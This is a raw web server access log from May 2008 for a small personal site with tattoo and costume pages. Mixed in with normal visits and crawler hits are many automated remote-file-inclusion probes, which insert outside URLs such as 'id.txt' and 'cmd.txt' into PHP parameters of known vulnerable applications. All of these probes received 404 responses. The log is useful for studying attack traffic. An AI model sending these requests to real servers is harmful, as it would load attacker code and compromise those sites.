82.146.40.49 - - [23/May/2008:12:15:48 -0500] "GET /logs/access_log.1207785600//admin.php?include_path=http://www.hssilva.net/ess//claroline/tracking/TT??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
82.146.40.49 - - [23/May/2008:12:15:48 -0500] "GET //admin.php?include_path=http://www.hssilva.net/ess//claroline/tracking/TT??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
82.146.40.49 - - [23/May/2008:12:15:48 -0500] "GET /logs//admin.php?include_path=http://www.hssilva.net/ess//claroline/tracking/TT??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
62.141.39.30 - - [23/May/2008:12:17:45 -0500] "GET /logs//login.php?dir=http://xflash9.com/tattert/image/tree/ID.gif???? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
62.141.39.30 - - [23/May/2008:12:17:46 -0500] "GET //login.php?dir=http://xflash9.com/tattert/image/tree/ID.gif???? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
213.239.217.9 - - [23/May/2008:12:29:02 -0500] "GET //s?ie=UTF8&keywords=earthdawn%2F%2Fadmin.php%3Finclude_path&index=blended&page=http://fadhilla.net/test.txt? HTTP/1.1" 404 286 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
213.239.217.9 - - [23/May/2008:12:29:03 -0500] "GET /logs//s?ie=UTF8&keywords=earthdawn%2F%2Fadmin.php%3Finclude_path&index=blended&page=http://fadhilla.net/test.txt? HTTP/1.1" 404 291 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.136.89 - - [23/May/2008:12:29:38 -0500] "GET //s?ie=UTF8&keywords=earthdawn%2F%2Fadmin.php%3Finclude_path&index=blended&page=http://fadhilla.net/test.txt? HTTP/1.1" 404 286 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
72.52.136.89 - - [23/May/2008:12:29:39 -0500] "GET /logs//s?ie=UTF8&keywords=earthdawn%2F%2Fadmin.php%3Finclude_path&index=blended&page=http://fadhilla.net/test.txt? HTTP/1.1" 404 291 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
72.52.136.89 - - [23/May/2008:12:29:52 -0500] "GET /logs//s?ie=UTF8&keywords=earthdawn%2F%2Fadmin.php%3Finclude_path&index=blended&page=http://fadhilla.net/test.txt? HTTP/1.1" 404 291 "-""Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
72.52.136.89 - - [23/May/2008:12:29:52 -0500] "GET //s?ie=UTF8&keywords=earthdawn%2F%2Fadmin.php%3Finclude_path&index=blended&page=http://fadhilla.net/test.txt? HTTP/1.1" 404 286 "-""Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
65.55.208.135 - - [23/May/2008:12:29:56 -0500] "GET /logs/access_log.1186531200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
62.193.211.155 - - [23/May/2008:12:30:36 -0500] "GET //s?ie=UTF8&keywords=earthdawn%2F%2Fadmin.php%3Finclude_path&index=blended&page=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 286 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
209.62.80.134 - - [23/May/2008:12:30:36 -0500] "GET //s?ie=UTF8&keywords=earthdawn%2F%2Fadmin.php%3Finclude_path&index=blended&page=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 286 "-""Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
209.62.80.134 - - [23/May/2008:12:30:37 -0500] "GET /logs//s?ie=UTF8&keywords=earthdawn%2F%2Fadmin.php%3Finclude_path&index=blended&page=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 291 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
62.193.211.155 - - [23/May/2008:12:30:37 -0500] "GET /logs//s?ie=UTF8&keywords=earthdawn%2F%2Fadmin.php%3Finclude_path&index=blended&page=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 291 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
205.234.186.154 - - [23/May/2008:12:32:22 -0500] "GET //s?ie=UTF8&keywords=earthdawn%2F%2Fadmin.php%3Finclude_path&index=blended&page=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 286 "-""Mozilla/4.61 [en] (OS/2; U)"
205.234.186.154 - - [23/May/2008:12:32:22 -0500] "GET /logs//s?ie=UTF8&keywords=earthdawn%2F%2Fadmin.php%3Finclude_path&index=blended&page=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 291 "-""Mozilla/4.61 [en] (OS/2; U)"
217.67.26.84 - - [23/May/2008:12:32:38 -0500] "GET /logs/home.php?sit=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
217.67.26.84 - - [23/May/2008:12:32:38 -0500] "GET /home.php?sit=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
72.249.79.180 - - [23/May/2008:12:33:37 -0500] "GET /logs/index1.php?page=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
72.249.79.180 - - [23/May/2008:12:33:37 -0500] "GET /index1.php?page=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
84.243.253.159 - - [23/May/2008:12:46:10 -0500] "GET /logs/access_log.1207180800/home.php?sit=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 319 "-""libwww-perl/5.79"
84.243.253.159 - - [23/May/2008:12:46:10 -0500] "GET /home.php?sit=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
84.243.253.159 - - [23/May/2008:12:46:10 -0500] "GET /logs/home.php?sit=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
67.15.186.23 - - [23/May/2008:12:53:33 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.gasthof-neumeister.com/images/zoom/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.811"
67.15.186.23 - - [23/May/2008:12:53:34 -0500] "GET //skin/zero_vote/error.php?dir=http://www.gasthof-neumeister.com/images/zoom/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
76.212.224.128 - - [23/May/2008:12:57:54 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
76.212.224.128 - - [23/May/2008:12:57:55 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
76.212.224.128 - - [23/May/2008:12:57:55 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
76.212.224.128 - - [23/May/2008:12:57:59 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
74.6.17.181 - - [23/May/2008:12:58:04 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.17.181 - - [23/May/2008:12:58:05 -0500] "GET /logs/access_log.1192233600 HTTP/1.0" 200 124918 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
87.106.178.42 - - [23/May/2008:12:58:28 -0500] "GET /logs/home.php?sit=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
87.106.178.42 - - [23/May/2008:12:58:28 -0500] "GET /logs/home.php?sit=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
87.106.178.42 - - [23/May/2008:12:58:28 -0500] "GET /home.php?sit=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
87.106.178.42 - - [23/May/2008:12:58:29 -0500] "GET /home.php?sit=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
204.253.132.137 - - [23/May/2008:13:00:06 -0500] "GET //skin/zero_vote/error.php?dir=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
202.131.92.138 - - [23/May/2008:13:00:12 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://ylistus.info/ylistus/administrator/components/id.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
202.131.92.138 - - [23/May/2008:13:00:13 -0500] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://ylistus.info/ylistus/administrator/components/id.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
70.84.182.98 - - [23/May/2008:13:00:18 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
70.84.182.98 - - [23/May/2008:13:00:19 -0500] "GET //skin/zero_vote/error.php?dir=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
72.249.77.90 - - [23/May/2008:13:01:10 -0500] "GET /logs//s?ie=UTF8&keywords=earthdawn%2F%2Fadmin.php%3Finclude_path&index=blended&page=http://www.geocities.com/cefill/bangsat/anjing.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.805"
72.249.77.90 - - [23/May/2008:13:01:10 -0500] "GET //s?ie=UTF8&keywords=earthdawn%2F%2Fadmin.php%3Finclude_path&index=blended&page=http://www.geocities.com/cefill/bangsat/anjing.txt??? HTTP/1.1" 404 286 "-""libwww-perl/5.805"
217.194.33.88 - - [23/May/2008:13:01:22 -0500] "GET //skin/zero_vote/error.php?dir=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
72.47.201.117 - - [23/May/2008:13:03:16 -0500] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 339 "-""Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
99.175.236.97 - - [23/May/2008:13:04:27 -0500] "GET //skin/zero_vote/error.php?dir=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
199.198.212.34 - - [23/May/2008:13:05:48 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21563 "http://www.google.com/search?gbv=2&hl=en&q=jester+1500-1600+costume""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1)"
199.198.212.34 - - [23/May/2008:13:05:48 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1)"
66.249.19.17 - - [23/May/2008:13:07:42 -0500] "GET /logs/access_log.1207785600/modules/My_eGallery/index.php?basepath=http://www.hssilva.net/ess//claroline/tracking/TT??? HTTP/1.1" 404 340 "-""libwww-perl/5.810"
66.249.19.17 - - [23/May/2008:13:07:42 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.hssilva.net/ess//claroline/tracking/TT??? HTTP/1.1" 404 313 "-""libwww-perl/5.810"
66.249.19.17 - - [23/May/2008:13:07:43 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.hssilva.net/ess//claroline/tracking/TT??? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
82.192.70.11 - - [23/May/2008:13:08:07 -0500] "GET //skin/zero_vote/error.php?dir=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.64"
82.192.70.11 - - [23/May/2008:13:08:07 -0500] "GET //skin/zero_vote/error.php?dir=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.64"
207.7.108.240 - - [23/May/2008:13:11:30 -0500] "GET /logs//board//skin/zero_vote/error.php?dirhttp://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
207.7.108.240 - - [23/May/2008:13:11:30 -0500] "GET //board//skin/zero_vote/error.php?dirhttp://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
204.11.238.210 - - [23/May/2008:13:11:53 -0500] "GET /logs/modules/postguestbook/styles/internal_v5/header.php?tpl_pgb_moddir=http://h1.ripway.com/bhlcrew/id.txt? HTTP/1.1" 404 340 "-""libwww-perl/5.811"
204.11.238.210 - - [23/May/2008:13:11:53 -0500] "GET /modules/postguestbook/styles/internal_v5/header.php?tpl_pgb_moddir=http://h1.ripway.com/bhlcrew/id.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.811"
207.58.181.74 - - [23/May/2008:13:12:36 -0500] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 339 "-""libwww-perl/5.811"
207.58.181.74 - - [23/May/2008:13:12:36 -0500] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://medisana.co.kr/test? HTTP/1.1" 404 339 "-""libwww-perl/5.811"
68.249.242.162 - - [23/May/2008:13:16:27 -0500] "GET /tattoo/tattoo1.htm HTTP/1.0" 200 3776 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.249.242.162 - - [23/May/2008:13:16:27 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.0" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.249.242.162 - - [23/May/2008:13:16:27 -0500] "GET /tattoo/webring.jpg HTTP/1.0" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.249.242.162 - - [23/May/2008:13:16:32 -0500] "GET /tattoo/set2.htm HTTP/1.0" 200 2378 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.249.242.162 - - [23/May/2008:13:16:32 -0500] "GET /tattoo/tatb1.JPG HTTP/1.0" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.249.242.162 - - [23/May/2008:13:16:32 -0500] "GET /tattoo/tatb10.JPG HTTP/1.0" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.249.242.162 - - [23/May/2008:13:16:32 -0500] "GET /tattoo/tatb3.JPG HTTP/1.0" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.249.242.162 - - [23/May/2008:13:16:32 -0500] "GET /tattoo/tatb6.JPG HTTP/1.0" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.249.242.162 - - [23/May/2008:13:16:32 -0500] "GET /tattoo/tatb7.JPG HTTP/1.0" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.249.242.162 - - [23/May/2008:13:16:32 -0500] "GET /tattoo/tatb8.JPG HTTP/1.0" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.249.242.162 - - [23/May/2008:13:16:33 -0500] "GET /tattoo/tatb9.JPG HTTP/1.0" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.249.242.162 - - [23/May/2008:13:16:33 -0500] "GET /tattoo/tatb4.JPG HTTP/1.0" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.249.242.162 - - [23/May/2008:13:16:33 -0500] "GET /tattoo/tatb5.JPG HTTP/1.0" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.249.242.162 - - [23/May/2008:13:16:33 -0500] "GET /tattoo/tatb2.JPG HTTP/1.0" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.249.242.162 - - [23/May/2008:13:17:03 -0500] "GET /tattoo/set1.htm HTTP/1.0" 200 2676 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.249.242.162 - - [23/May/2008:13:17:03 -0500] "GET /tattoo/tat1.JPG HTTP/1.0" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.249.242.162 - - [23/May/2008:13:17:03 -0500] "GET /tattoo/tat10.JPG HTTP/1.0" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.249.242.162 - - [23/May/2008:13:17:03 -0500] "GET /tattoo/tat2.JPG HTTP/1.0" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.249.242.162 - - [23/May/2008:13:17:03 -0500] "GET /tattoo/tat3.jpg HTTP/1.0" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.249.242.162 - - [23/May/2008:13:17:04 -0500] "GET /tattoo/tat4.JPG HTTP/1.0" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.249.242.162 - - [23/May/2008:13:17:04 -0500] "GET /tattoo/tat5.JPG HTTP/1.0" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.249.242.162 - - [23/May/2008:13:17:04 -0500] "GET /tattoo/tat6.JPG HTTP/1.0" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.249.242.162 - - [23/May/2008:13:17:04 -0500] "GET /tattoo/tat7.JPG HTTP/1.0" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.249.242.162 - - [23/May/2008:13:17:04 -0500] "GET /tattoo/tat8.jpg HTTP/1.0" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.249.242.162 - - [23/May/2008:13:17:04 -0500] "GET /tattoo/tat9.JPG HTTP/1.0" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.249.242.162 - - [23/May/2008:13:17:17 -0500] "GET /tattoo/set3.htm HTTP/1.0" 200 2214 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.249.242.162 - - [23/May/2008:13:17:17 -0500] "GET /tattoo/tatc10.JPG HTTP/1.0" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.249.242.162 - - [23/May/2008:13:17:17 -0500] "GET /tattoo/tatc1.JPG HTTP/1.0" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.249.242.162 - - [23/May/2008:13:17:17 -0500] "GET /tattoo/tatc3.JPG HTTP/1.0" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.249.242.162 - - [23/May/2008:13:17:17 -0500] "GET /tattoo/tatc2.JPG HTTP/1.0" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.249.242.162 - - [23/May/2008:13:17:17 -0500] "GET /tattoo/tatc4.JPG HTTP/1.0" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.249.242.162 - - [23/May/2008:13:17:17 -0500] "GET /tattoo/tatc8.JPG HTTP/1.0" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.249.242.162 - - [23/May/2008:13:17:17 -0500] "GET /tattoo/tatc6.JPG HTTP/1.0" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.249.242.162 - - [23/May/2008:13:17:17 -0500] "GET /tattoo/tatc7.JPG HTTP/1.0" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.249.242.162 - - [23/May/2008:13:17:18 -0500] "GET /tattoo/tatc9.JPG HTTP/1.0" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.249.242.162 - - [23/May/2008:13:17:18 -0500] "GET /tattoo/tatc5.JPG HTTP/1.0" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.249.242.162 - - [23/May/2008:13:17:48 -0500] "GET /tattoo/set4.htm HTTP/1.0" 200 1991 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.249.242.162 - - [23/May/2008:13:17:48 -0500] "GET /tattoo/tatd1.JPG HTTP/1.0" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.249.242.162 - - [23/May/2008:13:17:48 -0500] "GET /tattoo/tatd2.JPG HTTP/1.0" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.249.242.162 - - [23/May/2008:13:17:48 -0500] "GET /tattoo/tatd3.JPG HTTP/1.0" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.249.242.162 - - [23/May/2008:13:17:48 -0500] "GET /tattoo/tatd4.JPG HTTP/1.0" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.249.242.162 - - [23/May/2008:13:17:48 -0500] "GET /tattoo/tatd6.JPG HTTP/1.0" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.249.242.162 - - [23/May/2008:13:17:48 -0500] "GET /tattoo/tatd7.JPG HTTP/1.0" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.249.242.162 - - [23/May/2008:13:17:48 -0500] "GET /tattoo/tatd10.JPG HTTP/1.0" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.249.242.162 - - [23/May/2008:13:17:48 -0500] "GET /tattoo/msameric.JPG HTTP/1.0" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.249.242.162 - - [23/May/2008:13:17:49 -0500] "GET /tattoo/tatd9.JPG HTTP/1.0" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.249.242.162 - - [23/May/2008:13:17:49 -0500] "GET /tattoo/tatd8.JPG HTTP/1.0" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.192.70.11 - - [23/May/2008:13:18:29 -0500] "GET /logs/access_log.1207785600//skin/zero_vote/error.php?dir=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.64"
82.192.70.11 - - [23/May/2008:13:18:30 -0500] "GET //skin/zero_vote/error.php?dir=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.64"
82.192.70.11 - - [23/May/2008:13:18:30 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.64"
82.192.70.11 - - [23/May/2008:13:18:36 -0500] "GET /logs/access_log.1207785600//skin/zero_vote/error.php?dir=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.64"
82.192.70.11 - - [23/May/2008:13:18:36 -0500] "GET //skin/zero_vote/error.php?dir=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.64"
82.192.70.11 - - [23/May/2008:13:18:36 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.64"
217.194.33.88 - - [23/May/2008:13:20:06 -0500] "GET /logs/access_log.1207785600//skin/zero_vote/error.php?dir=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
217.194.33.88 - - [23/May/2008:13:20:07 -0500] "GET //skin/zero_vote/error.php?dir=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
217.194.33.88 - - [23/May/2008:13:20:07 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
62.163.140.46 - - [23/May/2008:13:20:19 -0500] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
62.163.140.46 - - [23/May/2008:13:20:19 -0500] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
66.230.197.170 - - [23/May/2008:13:23:35 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.nameserver11.net/billing2/include/html/klenk.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
66.230.197.170 - - [23/May/2008:13:23:36 -0500] "GET //skin/zero_vote/error.php?dir=http://www.nameserver11.net/billing2/include/html/klenk.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
66.230.197.170 - - [23/May/2008:13:23:47 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.nameserver11.net/billing2/include/html/klenk.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
66.230.197.170 - - [23/May/2008:13:23:47 -0500] "GET //skin/zero_vote/error.php?dir=http://www.nameserver11.net/billing2/include/html/klenk.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
70.87.81.18 - - [23/May/2008:13:23:57 -0500] "GET /logs/access_log.1207785600//skin/zero_vote/error.php?dir=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.811"
70.87.81.18 - - [23/May/2008:13:23:57 -0500] "GET //skin/zero_vote/error.php?dir=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
